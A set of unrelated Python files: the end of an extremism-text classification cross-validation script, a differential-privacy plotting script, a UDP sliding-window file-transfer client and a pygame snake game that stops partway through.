                trainingAccuracy = fitHistory.history['acc']
                if(epochs == 100):
                    break
            nonViolentExtremismScore = nonViolentExtremismModel.evaluate(X_Test,nonViolentExtremismTest,verbose = 100)
            accuNonViolentExtremismLstm1 = nonViolentExtremismScore[1]
            print("\nNon Violent Extremism Training Done for Iteration ",iteration, " for part 1 with epochs : ", epochs)
            positiveViolentExtremism = [x for x in nonViolentExtremismTest if x[0] == 1]
            predictNonViolentExtremism = nonViolentExtremismModel.predict_classes(X_Test, verbose = 1)
            positivePredNonViolentExtremism = [x for x in predictNonViolentExtremism if x > 0]
            prec1, recall1, fscore1, support1 = precision_recall_fscore_support(nonViolentExtremismTest1, predictNonViolentExtremism)
            print("Number of positive Examples : ",len(positiveViolentExtremism), "\nratio : ", (len(positiveViolentExtremism) / len(nonViolentExtremismTest)), "\nPositive Predicted : ", len(positivePredNonViolentExtremism), "\naccuracy : ", accuNonViolentExtremismLstm1, "\nwrongness : ", 1 - accuNonViolentExtremismLstm1,"\n\nPrecision : ",prec1,"\nRecall : ", recall1, "\nf1Score : ", fscore1, "\nsupport : ", support1 )
            gNonViolentExtremismAccu += accuNonViolentExtremismLstm1
            # Per-class metric entries can be missing when a class is absent
            # from a fold; the try/except blocks skip those entries.
            gNonViolentExtremismPrecision[0] += prec1[0]
            try:
                gNonViolentExtremismPrecision[1] += prec1[1]
            except:
                #doNothing
                print("LAla")
            try:
                gNonViolentExtremismPrecision[2] += prec1[2]
            except:
                print("LALALALA")
            gNonViolentExtremismRecall[0] += recall1[0]
            try:
                gNonViolentExtremismRecall[1] += recall1[1]
            except:
                #doNothing
                print("LAla")
            try:
                gNonViolentExtremismRecall[2] += recall1[2]
            except:
                print("LALALALA")
            gNonViolentExtremismFScore[0] += fscore1[0]
            try:
                gNonViolentExtremismFScore[1] += fscore1[1]
            except:
                #doNothing
                print("LAla")
            try:
                gNonViolentExtremismFScore[2] += fscore1[2]
            except:
                print("LALALALA")
            gNonViolentExtremismEpochs += epochs
        # Free the fold's model and GPU memory before the next fold.
        with timer("trying to clear GPU memory"):
            del nonViolentExtremismModel
            backend.clear_session()
            for i in range(20):
                gc.collect()
#######################################################################################################################
with timer("Cross Validation for Radical Violence"):
    # K-fold cross-validation for the "Radical Violence" label.  For every
    # fold a fresh Embedding -> Conv1D -> stacked-LSTM classifier is built,
    # trained until the accuracy/epoch targets are met, evaluated on the
    # held-out fold, and its metrics accumulated into the gRadicalViolence*
    # globals (averaged later in the "Final Output" section).
    iteration = 0
    for train_index, test_index in kf.split(Features):
        with timer("Making nueral network for iteration : " + str(iteration + 1) + " for Radical Violence"):
            print("\n\n\n\nMaking nueral Network for iteration:", iteration, " for Radical Violence")
            iteration += 1
            # Build the train/test split for this fold.
            X_Train = [Features[x] for x in train_index]
            X_Test = [Features[x] for x in test_index]
            radicalViolenceTrain = YRadicalViolence[train_index]
            radicalViolenceTest = YRadicalViolence[test_index]
            radicalViolenceTest1 = [radicalViolence[x] for x in test_index]
            # Tokenise and pad every document to a fixed length.
            tokenisedTrain = tokenizer.texts_to_sequences(X_Train)
            tokenisedTest = tokenizer.texts_to_sequences(X_Test)
            max_review_length = 180
            X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length, padding='post')
            X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length, padding='post')
            # Model: pretrained embeddings -> Conv1D -> 3 stacked LSTMs -> 3-way output.
            radicalViolenceModel = Sequential()
            radicalViolenceModel.add(Embedding(vocabSize, 100, input_length=max_review_length, weights=[embedding_matrix]))
            radicalViolenceModel.add(Dropout(0.2))
            radicalViolenceModel.add(Conv1D(64, 5, activation='relu'))
            radicalViolenceModel.add(MaxPooling1D(pool_size=4))
            radicalViolenceModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
            radicalViolenceModel.add(LSTM(32, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
            radicalViolenceModel.add(LSTM(16, dropout=0.2, recurrent_dropout=0.2))
            radicalViolenceModel.add(Dense(3, activation='sigmoid'))
            radicalViolenceModel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
            epochs = 1
            # BUGFIX: progress messages previously said "Violent Extremism"
            # (copy/paste from an earlier section); this trains Radical Violence.
            print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Radical Violence")
            fitHistory = radicalViolenceModel.fit(X_Train, radicalViolenceTrain, epochs=1, batch_size=150)
            trainingAccuracy = fitHistory.history['acc']
            # Train one epoch at a time: the `or` keeps the loop alive while
            # EITHER target (accuracy >= 0.99, epochs >= 15) is unmet, hard
            # capped at 100 epochs.  NOTE(review): confirm `or` vs `and` intent.
            while (trainingAccuracy[0] < 0.99 or epochs < 15):
                epochs += 1
                print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Radical Violence")
                fitHistory = radicalViolenceModel.fit(X_Train, radicalViolenceTrain, epochs=1, batch_size=150)
                trainingAccuracy = fitHistory.history['acc']
                if (epochs == 100):
                    break
            radicalViolenceScore = radicalViolenceModel.evaluate(X_Test, radicalViolenceTest, verbose=100)
            accuRadicalViolenceLstm1 = radicalViolenceScore[1]
            print("\nRadical Violence Training Done for Iteration ", iteration, " for part 1 with epochs : ", epochs)
            positiveRadicalViolence = [x for x in radicalViolenceTest if x[0] == 1]
            predictRadicalViolence = radicalViolenceModel.predict_classes(X_Test, verbose=1)
            positivePredRadicalViolence = [x for x in predictRadicalViolence if x > 0]
            prec1, recall1, fscore1, support1 = precision_recall_fscore_support(radicalViolenceTest1, predictRadicalViolence)
            print("Number of positive Examples : ", len(positiveRadicalViolence), "\nratio : ", (len(positiveRadicalViolence) / len(radicalViolenceTest)), "\nPositive Predicted : ", len(positivePredRadicalViolence), "\naccuracy : ", accuRadicalViolenceLstm1, "\nwrongness : ", 1 - accuRadicalViolenceLstm1, "\n\nPrecision : ", prec1, "\nRecall : ", recall1, "\nf1Score : ", fscore1, "\nsupport : ", support1)
            gRadicalViolenceAccu += accuRadicalViolenceLstm1
            # The per-class metric arrays can have fewer than 3 entries when a
            # fold contains fewer than 3 distinct classes.  BUGFIX: the old
            # bare `except:` also swallowed unrelated errors (even
            # KeyboardInterrupt); only IndexError is expected here.
            gRadicalViolencePrecision[0] += prec1[0]
            try:
                gRadicalViolencePrecision[1] += prec1[1]
            except IndexError:
                print("LAla")
            try:
                gRadicalViolencePrecision[2] += prec1[2]
            except IndexError:
                print("LALALALA")
            gRadicalViolenceRecall[0] += recall1[0]
            try:
                gRadicalViolenceRecall[1] += recall1[1]
            except IndexError:
                print("LAla")
            try:
                gRadicalViolenceRecall[2] += recall1[2]
            except IndexError:
                print("LALALALA")
            gRadicalViolenceFScore[0] += fscore1[0]
            try:
                gRadicalViolenceFScore[1] += fscore1[1]
            except IndexError:
                print("LAla")
            try:
                gRadicalViolenceFScore[2] += fscore1[2]
            except IndexError:
                print("LALALALA")
            gRadicalViolenceEpochs += epochs
        with timer("trying to clear GPU memory"):
            # Drop the model and force Keras/TF to release GPU memory between folds.
            del radicalViolenceModel
            backend.clear_session()
            for i in range(20):
                gc.collect()
with timer("Cross Validation for Non Radical Violence"):
    # K-fold cross-validation for the "Non Radical Violence" label; same
    # pipeline as the other labels, accumulating into the
    # gNonRadicalViolence* globals.
    iteration = 0
    for train_index, test_index in kf.split(Features):
        with timer("Making nueral network for iteration : " + str(iteration + 1) + " for Non Radical Violence"):
            print("\n\n\n\nMaking nueral Network for iteration:", iteration, " for Non Radical Violence")
            iteration += 1
            # Build the train/test split for this fold.
            X_Train = [Features[x] for x in train_index]
            X_Test = [Features[x] for x in test_index]
            nonRadicalViolenceTrain = YNonRadicalViolence[train_index]
            nonRadicalViolenceTest = YNonRadicalViolence[test_index]
            nonRadicalViolenceTest1 = [nonRadicalViolence[x] for x in test_index]
            # Tokenise and pad every document to a fixed length.
            tokenisedTrain = tokenizer.texts_to_sequences(X_Train)
            tokenisedTest = tokenizer.texts_to_sequences(X_Test)
            max_review_length = 180
            X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length, padding='post')
            X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length, padding='post')
            # Model: pretrained embeddings -> Conv1D -> 3 stacked LSTMs -> 3-way output.
            nonRadicalViolenceModel = Sequential()
            nonRadicalViolenceModel.add(Embedding(vocabSize, 100, input_length=max_review_length, weights=[embedding_matrix]))
            nonRadicalViolenceModel.add(Dropout(0.2))
            nonRadicalViolenceModel.add(Conv1D(64, 5, activation='relu'))
            nonRadicalViolenceModel.add(MaxPooling1D(pool_size=4))
            nonRadicalViolenceModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
            nonRadicalViolenceModel.add(LSTM(32, dropout=0.2, recurrent_dropout=0.2, return_sequences=True))
            nonRadicalViolenceModel.add(LSTM(16, dropout=0.2, recurrent_dropout=0.2))
            nonRadicalViolenceModel.add(Dense(3, activation='sigmoid'))
            nonRadicalViolenceModel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
            epochs = 1
            # BUGFIX: progress messages previously said "Non Violent
            # Extremism" (copy/paste); this trains Non Radical Violence.
            print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Non Radical Violence")
            fitHistory = nonRadicalViolenceModel.fit(X_Train, nonRadicalViolenceTrain, epochs=1, batch_size=150)
            trainingAccuracy = fitHistory.history['acc']
            # Train one epoch at a time: the `or` keeps the loop alive while
            # EITHER target (accuracy >= 0.99, epochs >= 15) is unmet, hard
            # capped at 100 epochs.  NOTE(review): confirm `or` vs `and` intent.
            while (trainingAccuracy[0] < 0.99 or epochs < 15):
                epochs += 1
                print("\nTraining until accuracy improves for epoch = ", epochs, " for iteration : ", iteration, " for Non Radical Violence")
                fitHistory = nonRadicalViolenceModel.fit(X_Train, nonRadicalViolenceTrain, epochs=1, batch_size=150)
                trainingAccuracy = fitHistory.history['acc']
                if (epochs == 100):
                    break
            nonRadicalViolenceScore = nonRadicalViolenceModel.evaluate(X_Test, nonRadicalViolenceTest, verbose=100)
            accuNonRadicalViolenceLstm1 = nonRadicalViolenceScore[1]
            print("\nNon Radical Violence Training Done for Iteration ", iteration, " for part 1 with epochs : ", epochs)
            positiveNonRadicalViolence = [x for x in nonRadicalViolenceTest if x[0] == 1]
            predictNonRadicalViolence = nonRadicalViolenceModel.predict_classes(X_Test, verbose=1)
            positivePredNonRadicalViolence = [x for x in predictNonRadicalViolence if x > 0]
            prec1, recall1, fscore1, support1 = precision_recall_fscore_support(nonRadicalViolenceTest1, predictNonRadicalViolence)
            print("Number of positive Examples : ", len(positiveNonRadicalViolence), "\nratio : ", (len(positiveNonRadicalViolence) / len(nonRadicalViolenceTest)), "\nPositive Predicted : ", len(positivePredNonRadicalViolence), "\naccuracy : ", accuNonRadicalViolenceLstm1, "\nwrongness : ", 1 - accuNonRadicalViolenceLstm1, "\n\nPrecision : ", prec1, "\nRecall : ", recall1, "\nf1Score : ", fscore1, "\nsupport : ", support1)
            gNonRadicalViolenceAccu += accuNonRadicalViolenceLstm1
            # The per-class metric arrays can have fewer than 3 entries when a
            # fold contains fewer than 3 distinct classes.  BUGFIX: narrowed
            # the old bare `except:` to the only expected IndexError.
            gNonRadicalViolencePrecision[0] += prec1[0]
            try:
                gNonRadicalViolencePrecision[1] += prec1[1]
            except IndexError:
                print("LAla")
            try:
                gNonRadicalViolencePrecision[2] += prec1[2]
            except IndexError:
                print("LALALALA")
            gNonRadicalViolenceRecall[0] += recall1[0]
            try:
                gNonRadicalViolenceRecall[1] += recall1[1]
            except IndexError:
                print("LAla")
            try:
                gNonRadicalViolenceRecall[2] += recall1[2]
            except IndexError:
                print("LALALALA")
            gNonRadicalViolenceFScore[0] += fscore1[0]
            try:
                gNonRadicalViolenceFScore[1] += fscore1[1]
            except IndexError:
                print("LAla")
            try:
                gNonRadicalViolenceFScore[2] += fscore1[2]
            except IndexError:
                print("LALALALA")
            gNonRadicalViolenceEpochs += epochs
        with timer("trying to clear GPU memory"):
            # Drop the model and force Keras/TF to release GPU memory between folds.
            del nonRadicalViolenceModel
            backend.clear_session()
            for i in range(20):
                gc.collect()
with timer("Final Output"):
    # Average every accumulated metric over the 10 cross-validation folds,
    # then print one summary section per label.
    folds = 10
    gViolentExtremismAccu = gViolentExtremismAccu / folds
    gViolentExtremismEpochs = gViolentExtremismEpochs / folds
    gViolentExtremismPrecision = [p / folds for p in gViolentExtremismPrecision]
    gViolentExtremismRecall = [p / folds for p in gViolentExtremismRecall]
    gViolentExtremismFScore = [p / folds for p in gViolentExtremismFScore]
    gNonViolentExtremismAccu = gNonViolentExtremismAccu / folds
    gNonViolentExtremismEpochs = gNonViolentExtremismEpochs / folds
    gNonViolentExtremismPrecision = [p / folds for p in gNonViolentExtremismPrecision]
    gNonViolentExtremismRecall = [p / folds for p in gNonViolentExtremismRecall]
    gNonViolentExtremismFScore = [p / folds for p in gNonViolentExtremismFScore]
    gRadicalViolenceAccu = gRadicalViolenceAccu / folds
    gRadicalViolenceEpochs = gRadicalViolenceEpochs / folds
    gRadicalViolencePrecision = [p / folds for p in gRadicalViolencePrecision]
    gRadicalViolenceRecall = [p / folds for p in gRadicalViolenceRecall]
    gRadicalViolenceFScore = [p / folds for p in gRadicalViolenceFScore]
    gNonRadicalViolenceAccu = gNonRadicalViolenceAccu / folds
    gNonRadicalViolenceEpochs = gNonRadicalViolenceEpochs / folds
    gNonRadicalViolencePrecision = [p / folds for p in gNonRadicalViolencePrecision]
    gNonRadicalViolenceRecall = [p / folds for p in gNonRadicalViolenceRecall]
    gNonRadicalViolenceFScore = [p / folds for p in gNonRadicalViolenceFScore]
    print("\n\n\n\n")
    print("Score for Violent Extremism : \n", "accuracy : ", gViolentExtremismAccu, "\nPrecision : ", gViolentExtremismPrecision, "\nRecall : ", gViolentExtremismRecall, "\nFScore : ", gViolentExtremismFScore, "\nAverageEpochs : ", gViolentExtremismEpochs)
    print("\n\n\n\n")
    print("Score for Non Violent Extremism : \n", "accuracy : ", gNonViolentExtremismAccu, "\nPrecision : ", gNonViolentExtremismPrecision, "\nRecall : ", gNonViolentExtremismRecall, "\nFScore : ", gNonViolentExtremismFScore, "\nAverageEpochs : ", gNonViolentExtremismEpochs)
    print("\n\n\n\n")
    print("Score for Radical Violence : \n", "accuracy : ", gRadicalViolenceAccu, "\nPrecision : ", gRadicalViolencePrecision, "\nRecall : ", gRadicalViolenceRecall, "\nFScore : ", gRadicalViolenceFScore, "\nAverageEpochs : ", gRadicalViolenceEpochs)
    print("\n\n\n\n")
    print("Score for Non Radical Violence : \n", "accuracy : ", gNonRadicalViolenceAccu, "\nPrecision : ", gNonRadicalViolencePrecision, "\nRecall : ", gNonRadicalViolenceRecall, "\nFScore : ", gNonRadicalViolenceFScore, "\nAverageEpochs : ", gNonRadicalViolenceEpochs)
|
#!/usr/bin/python
# coding=utf-8
import sys
import re
import os
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import ticker
from matplotlib.backends.backend_pdf import PdfPages
from datetime import datetime
def delta_eps_plot(plot_name, filename):
    """Plot delta as a function of epsilon for four noise distributions.

    Reads a CSV (column 0 = epsilon, columns 1-4 = delta curves) from
    *filename*, annotates where two of the curves cross delta = 0.5e-5, and
    writes a single-page PDF to *plot_name*.
    """
    data = np.genfromtxt(filename, delimiter=',')
    fig_width_pt = 300.0  # Get this from LaTeX using \showthe
    inches_per_pt = 1.0 / 72.27 * 2  # Convert pt to inches
    # BUGFIX: np.math was a deprecated alias (removed in NumPy >= 1.25);
    # call np.sqrt directly.
    golden_mean = ((np.sqrt(5) - 1.0) / 2.0)  # Aesthetic ratio
    fig_width = fig_width_pt * inches_per_pt  # width in inches
    fig_height = (fig_width * golden_mean)  # height in inches
    fig_size = [0.95 * fig_width, 0.95 * fig_height]
    params = {'backend': 'ps',
              'axes.labelsize': 20,
              'legend.fontsize': 18,
              'xtick.labelsize': 18,
              'ytick.labelsize': 18,
              'font.size': 18,
              'font.family': 'times new roman'}
    pdf_pages = PdfPages(os.path.join(plot_name))
    plt.rcParams.update(params)
    plt.axes([0.12, 0.32, 0.85, 0.63], frameon=True)
    plt.rc('pdf', fonttype=42)  # IMPORTANT to get rid of Type 3
    colors = ['0.1', '0.2', '0.3', '0.4']
    linestyles = ['-', ':', '--', '-.']
    dotstyle = ['', '', '', '']
    plt.plot(data[:, 0], data[:, 1], dotstyle[0], color=colors[0], linestyle=linestyles[0], linewidth=2, zorder=3,
             label=r'$\mathcal{{N}}(0,{{{:d}}}^2)$'.format(150))
    plt.plot(data[:, 0], data[:, 2], dotstyle[0], color=colors[1], linestyle=linestyles[1], linewidth=2, zorder=3,
             label=r'$2 \cdot \mathcal{{B}}({{{:d}}}, \frac{{1}}{{2}})$'.format(22500))
    plt.plot(data[:, 0], data[:, 3], dotstyle[0], color=colors[2], linestyle=linestyles[2], linewidth=2, zorder=3,
             label=r'$3 \cdot \mathcal{{B}}({{{:d}}}, \frac{{1}}{{2}})$'.format(10000))
    plt.plot(data[:, 0], data[:, 4], dotstyle[0], color=colors[3], linestyle=linestyles[3], linewidth=2, zorder=3,
             label=r'$4 \cdot \mathcal{{B}}({{{:d}}}, \frac{{1}}{{2}})$'.format(5625))
    # Mark where the first and last curves are closest to the target delta.
    delta_point = 0.5 * 10 ** -5
    # BUGFIX: raw strings so the LaTeX escapes (\epsilon, \delta) are not
    # interpreted as (invalid) Python escape sequences.
    pointG = np.abs(np.array(data[:, 1]) - delta_point).argmin()
    plt.text(data[pointG, 0], 1.1 * delta_point, r"$\epsilon={{{:.2f}}}$".format(data[pointG, 0]))
    pointB4 = np.abs(np.array(data[:, 4]) - delta_point).argmin()
    plt.text(data[pointB4, 0], 1.1 * delta_point, r"$\epsilon ={{{:.2f}}}$".format(data[pointB4, 0]))
    plt.legend()
    plt.xlabel(r'$\epsilon$')
    plt.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))
    plt.ylabel(r'$\delta$')
    plt.ylim(ymin=0, ymax=1.5 * 10 ** -5)
    plt.xlim(xmin=0.5, xmax=2.5)
    plt.axhline(y=delta_point, color='0.4', linestyle='--')
    plt.grid(True, linestyle=':', color='0.6', zorder=0, linewidth=1.2)
    F = plt.gcf()
    F.set_size_inches(fig_size)
    pdf_pages.savefig(F, bbox_inches='tight', pad_inches=0.1)
    # BUGFIX: Python-2-only `print` statement; the call form below behaves
    # identically on Python 2 (single parenthesized expression) and Python 3.
    print("generated " + plot_name)
    plt.clf()
    pdf_pages.close()
delta_eps_plot("delta-eps.pdf", "delta-eps.csv")
|
import socket
import argparse
import time
import datetime
from net_structure import Packet, decode
def packets_prepare(packet_size, file_name):
    """Split the contents of *file_name* into 'D' (data) Packets.

    Each packet carries at most *packet_size* characters and a sequential
    id starting at 0. Returns the list of Packet objects.
    """
    # BUGFIX: the file handle was never closed; use a context manager.
    with open(file_name, 'r') as f:
        source = f.read()
    packets = []
    # One packet per packet_size-sized slice of the source text.
    for packet_id, offset in enumerate(range(0, len(source), packet_size)):
        packets.append(Packet('D', packet_id, source[offset:offset + packet_size]))
    return packets
def trysend(sock, content, server, port):
    """Best-effort UDP send: forward *content* to (server, port), ignoring OSError.

    Send failures are deliberately swallowed; the sliding-window protocol
    recovers lost packets via retransmission anyway.
    """
    destination = (server, port)
    try:
        sock.sendto(content, destination)
    except OSError:
        pass
def client(server, server_port, window_size, timeout, packet_size, packets):
    """Send *packets* to (server, server_port) over UDP with a sliding window.

    First handshakes a 'P' (prepare) packet until the server ACKs it, then
    streams data packets keeping at most *window_size* unACKed packets in
    flight, retransmitting the whole outstanding window on timeout.

    Returns (elapsed_seconds, retransmitted_packet_count, retransmitted_bytes).
    """
    start_time = time.time()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Enlarge the send buffer so a burst of a full window fits.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 64 * 1024)
    sock.settimeout(timeout)
    total_packets = len(packets)
    next_packet = 0
    window = []  # in-flight (sent but not yet ACKed) packets
    # Handshake: announce the total packet count until the server ACKs it.
    prep = Packet('P', total_packets, [])
    prep_acked = False
    while not prep_acked:
        sock.sendto(prep.encode(), (server, server_port))
        try:
            data, addr = sock.recvfrom(packet_size)
            pa = decode(data)
            if pa.flag == 'A':
                prep_acked = True
        except socket.timeout:
            continue
    print('Server ACKed. Start sending KJV Bible with packet size: {0}B, window size: {1} and timeout: {2} seconds.'
          .format(packet_size, window_size, timeout))
    packets_sent = 0
    # Main loop: run until every packet has been handed off AND ACKed.
    while next_packet < total_packets or (not len(window) == 0):
        # Top up the window with fresh packets and send them.
        while len(window) < window_size:
            if next_packet >= total_packets:
                break
            window.append(packets[next_packet])
            # sock.sendto(packets[next_packet].encode(), (server, server_port))
            trysend(sock, packets[next_packet].encode(), server, server_port)
            packets_sent += 1
            next_packet += 1
        try:
            data, addr = sock.recvfrom(4)
            cur_pack = decode(data)
            if cur_pack.flag == 'A':
                cur_elapsed = time.time() - start_time
                print('{0} / {1} packets ACKed. Average speed: {2} KB/s'
                      .format(cur_pack.pid + 1, total_packets,
                              ((cur_pack.pid + 1) * packet_size / 1024) / (float(cur_elapsed))), end='\r'),
                # ACKs are treated as cumulative: drop every window entry
                # whose pid is covered by this ACK.
                i = 0
                while i < len(window):
                    if cur_pack.pid >= window[i].pid:
                        del window[i]
                    else:
                        i += 1
        except socket.timeout:
            # Timeout: retransmit the entire outstanding window.
            for i in range(len(window)):
                # sock.sendto(window[i].encode(), (server, server_port))
                trysend(sock, window[i].encode(), server, server_port)
                packets_sent += 1
            continue
    print()
    time_used = float(time.time() - start_time)
    print('Complete! Time used: {0} seconds.'.format(time_used))
    sock.close()
    # (elapsed, packets sent beyond the minimum, bytes sent beyond the minimum)
    return time_used, packets_sent - total_packets, packet_size*(packets_sent - total_packets)
if __name__ == '__main__':
    # Command-line interface: five required positional arguments.
    parser = argparse.ArgumentParser()
    for arg_name, description in (
            ('server', 'The address of the server'),
            ('port', 'The port of the server'),
            ('packet_size', 'The size of each packet'),
            ('window_size', 'The size of send window'),
            ('timeout', 'The timeout for sender'),
    ):
        parser.add_argument(arg_name, help=description)
    args = parser.parse_args()
    size = int(args.packet_size)
    client(args.server, int(args.port), int(args.window_size), float(args.timeout),
           size, packets_prepare(size, 'kjv.txt'))
|
import pygame
from pygame.math import Vector2
import sys
import random
pygame.init()
# Game display surface: a square board of cell_count x cell_count grid
# cells, each cell_size pixels wide.
cell_size = 40
cell_count = 20
game_screen = pygame.display.set_mode((cell_size * cell_count,
                                       cell_size * cell_count))
pygame.display.set_caption('Snake Game')
# To restrict program's frame rate
clock = pygame.time.Clock()
# Shared assets: fruit sprite and the font used for the score display.
apple = pygame.image.load("Graphics/apple-image.png").convert_alpha()
game_font = pygame.font.Font("Font/PoetsenOne-Regular.ttf", 25)
class Obstacles:
    """Static wall blocks on the board, stored as grid-cell positions."""

    def __init__(self):
        # Two bracket-shaped walls, listed as (column, row) grid cells.
        cells = [
            (14, 5), (14, 4), (13, 4), (12, 4), (11, 4),
            (10, 4), (9, 4), (8, 4), (7, 4), (6, 4),
            (5, 4), (5, 5), (14, 14), (14, 15), (13, 15),
            (12, 15), (11, 15), (10, 15), (9, 15), (8, 15),
            (7, 15), (6, 15), (5, 15), (5, 14),
        ]
        self.blocks = [Vector2(col, row) for col, row in cells]

    def draw_obstacle(self):
        """Draw each obstacle cell as a solid dark-green rectangle."""
        for cell in self.blocks:
            rect = pygame.Rect(cell.x * cell_size,
                               cell.y * cell_size,
                               cell_size, cell_size)
            pygame.draw.rect(game_screen, (0, 100, 0), rect)
# Snake Class
class Snake:
    """The player-controlled snake: segment positions, movement and sprites."""

    def __init__(self):
        # Sprites chosen per frame from the directional variants below.
        self.head = None
        self.tail = None
        # Body segments in grid coordinates; index 0 is the head.
        self.body = [Vector2(5, 10), Vector2(4, 10), Vector2(3, 10)]
        # Movement direction: one grid cell per update tick.
        self.direction = Vector2(1, 0)
        # Directional head sprites.
        self.head_up = pygame.image.load('Graphics/head_up.png').convert_alpha()
        self.head_down = pygame.image.load('Graphics/head_down.png').convert_alpha()
        self.head_right = pygame.image.load('Graphics/head_right.png').convert_alpha()
        self.head_left = pygame.image.load('Graphics/head_left.png').convert_alpha()
        # Directional tail sprites.
        self.tail_up = pygame.image.load('Graphics/tail_up.png').convert_alpha()
        self.tail_down = pygame.image.load('Graphics/tail_down.png').convert_alpha()
        self.tail_right = pygame.image.load('Graphics/tail_right.png').convert_alpha()
        self.tail_left = pygame.image.load('Graphics/tail_left.png').convert_alpha()
        # Straight and corner body sprites (tr/tl/br/bl = corner orientations).
        self.body_vertical = pygame.image.load('Graphics/body_vertical.png').convert_alpha()
        self.body_horizontal = pygame.image.load('Graphics/body_horizontal.png').convert_alpha()
        self.body_tr = pygame.image.load('Graphics/body_tr.png').convert_alpha()
        self.body_tl = pygame.image.load('Graphics/body_tl.png').convert_alpha()
        self.body_br = pygame.image.load('Graphics/body_br.png').convert_alpha()
        self.body_bl = pygame.image.load('Graphics/body_bl.png').convert_alpha()
        self.crunch_sound = pygame.mixer.Sound('Sound/crunchy.wav')

    def update_head_graphics(self):
        """Pick the head sprite from the direction of head relative to its neighbour."""
        relative_position = self.body[1] - self.body[0]
        if relative_position == Vector2(1, 0):
            self.head = self.head_left
        elif relative_position == Vector2(-1, 0):
            self.head = self.head_right
        elif relative_position == Vector2(0, 1):
            self.head = self.head_up
        elif relative_position == Vector2(0, -1):
            self.head = self.head_down

    def update_tail_graphics(self):
        """Pick the tail sprite from the direction of the tail's neighbour."""
        relative_position = self.body[-2] - self.body[-1]
        if relative_position == Vector2(1, 0):
            self.tail = self.tail_left
        elif relative_position == Vector2(-1, 0):
            self.tail = self.tail_right
        elif relative_position == Vector2(0, 1):
            self.tail = self.tail_up
        elif relative_position == Vector2(0, -1):
            self.tail = self.tail_down

    def draw_snake(self):
        """Render every segment: head/tail sprites plus straight or corner pieces."""
        self.update_head_graphics()
        self.update_tail_graphics()
        # Using enumerate to get the index and element from array
        for index, part in enumerate(self.body):
            # Create a rectangle snake's body part surface
            x_pos = part.x * cell_size
            y_pos = part.y * cell_size
            snake_rect = pygame.Rect(x_pos, y_pos,
                                     cell_size, cell_size)
            # Find which direction the snake is heading
            if index == 0:
                game_screen.blit(self.head, snake_rect)
            elif index == len(self.body) - 1:
                game_screen.blit(self.tail, snake_rect)
            else:
                # Compare the neighbours' offsets to decide whether the
                # segment is straight (same x or same y) or a corner piece.
                relative_prev_part = self.body[index + 1] - part
                relative_next_part = self.body[index - 1] - part
                if relative_prev_part.x == relative_next_part.x:
                    game_screen.blit(self.body_vertical, snake_rect)
                elif relative_prev_part.y == relative_next_part.y:
                    game_screen.blit(self.body_horizontal, snake_rect)
                else:
                    # Corner: the sign combination of the two offsets selects
                    # one of the four corner sprites.
                    if (relative_prev_part.x == -1 and relative_next_part.y == -1) or \
                            (relative_prev_part.y == -1 and relative_next_part.x == -1):
                        game_screen.blit(self.body_tl, snake_rect)
                    elif (relative_prev_part.x == -1 and relative_next_part.y == 1) or \
                            (relative_prev_part.y == 1 and relative_next_part.x == -1):
                        game_screen.blit(self.body_bl, snake_rect)
                    elif (relative_prev_part.x == 1 and relative_next_part.y == -1) or \
                            (relative_prev_part.y == -1 and relative_next_part.x == 1):
                        game_screen.blit(self.body_tr, snake_rect)
                    elif (relative_prev_part.x == 1 and relative_next_part.y == 1) or \
                            (relative_prev_part.y == 1 and relative_next_part.x == 1):
                        game_screen.blit(self.body_br, snake_rect)

    def move_snake(self):
        """Advance one cell: drop the tail and prepend a new head."""
        # Copy body parts from head to tail-1
        body_copy = self.body[:-1]
        # Create a new head that has moved in right direction
        body_copy.insert(0, body_copy[0] + self.direction)
        self.body = body_copy

    def increase_snake(self):
        """Grow by one: prepend a new head while keeping the whole body."""
        body_copy = self.body[:]
        body_copy.insert(0, body_copy[0] + self.direction)
        self.body = body_copy

    def play_crunch_sound(self):
        """Play the eating sound effect (at low volume)."""
        self.crunch_sound.play()
        self.crunch_sound.set_volume(0.08)

    def reset(self):
        """Return to the initial 3-segment body; direction (0,0) pauses movement."""
        self.body = [Vector2(5, 10), Vector2(4, 10), Vector2(3, 10)]
        self.direction = Vector2(0, 0)
# Fruit Class
class Fruit:
    """The apple: occupies a single random grid cell."""

    def __init__(self):
        # Initial placement is simply a respawn onto a random cell.
        self.respawn_fruit()

    def draw_fruit(self):
        """Blit the apple sprite at the fruit's grid cell."""
        target = pygame.Rect(self.pos.x * cell_size,
                             self.pos.y * cell_size,
                             cell_size, cell_size)
        game_screen.blit(apple, target)

    def respawn_fruit(self):
        """Move the fruit to a uniformly random cell on the board."""
        self.x = random.randint(0, cell_count - 1)
        self.y = random.randint(0, cell_count - 1)
        self.pos = Vector2(self.x, self.y)
# Game logic class
class Main:
    """Game controller: owns the snake, fruit and obstacles and runs the rules."""

    def __init__(self):
        # Create snake and fruit class objects with main class object.
        self.snake = Snake()
        self.fruit = Fruit()
        self.obstacle = Obstacles()
        self.over = pygame.mixer.Sound('Sound/game_over.wav')

    def update(self):
        """Advance one game tick: move the snake, then apply eat/fail rules."""
        self.snake.move_snake()
        self.check_collision()
        self.check_fail()

    def draw_elements(self):
        """Draw the whole scene: grass, fruit, snake, score, obstacles."""
        self.draw_grass()
        self.fruit.draw_fruit()
        self.snake.draw_snake()
        self.draw_score()
        self.obstacle.draw_obstacle()

    def check_collision(self):
        """Handle eating the fruit and keep the fruit off occupied cells."""
        # Head on the fruit: eat it, grow, play the sound.
        if self.fruit.pos == self.snake.body[0]:
            self.fruit.respawn_fruit()
            self.snake.increase_snake()
            self.snake.play_crunch_sound()
